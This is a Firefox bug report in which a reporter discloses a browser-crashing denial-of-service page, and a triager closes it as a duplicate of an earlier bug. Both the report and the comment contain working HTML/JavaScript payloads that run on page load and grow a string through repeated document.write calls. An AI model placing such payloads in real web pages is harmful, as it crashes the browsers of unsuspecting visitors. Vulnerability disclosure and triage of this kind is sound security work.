Closed
Bug 576854
Opened 14 years ago
Closed 14 years ago
Denial of service
Categories
(Firefox :: Security, defect)
Tracking
()
RESOLVED
DUPLICATE
of bug 537620
People
(Reporter: kaboekloe, Unassigned)
Details
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB5; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; Media Center PC 4.0; InfoPath.2; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Build Identifier: vg this code make a Denial of service and crach browser: <body onload="javascript:inifiles();"></body> <script> function inifiles() { var b = '\x00\x13\xFF\x20\x00\x13\xFF\x24\x00\xE7\x08\x6D'; for (a =0;a<77777777777777;a++) { b+=b+'\x00\x13\xFF\x20\x00\x13\xFF\x24\x00\xE7\x08\x6D'; document.write('<html><marquee><h1>'+b+b); } } </script> Reproducible: Always Actual Results: If somebody place that html code to his website,and victim go to that web with this html code the browser will crach Expected Results: crach denial of service
Comment 1•14 years ago
|
||
Looks essentially the same as bug 537620. attachment 419887 [details] from bug 537620 is essentially the same as this. <body onload="javascript:DoS();"></body> <script> function DoS() { var buffer = 'A'; for (i =0;i<150;i++) { buffer+=buffer+'A'; document.write('<html><marquee>'+buffer+buffer); } } </script>
Group: core-security
Status: UNCONFIRMED → RESOLVED
Closed: 14 years ago
Resolution: --- → DUPLICATE
You need to log in
before you can comment on or make changes to this bug.
Description
•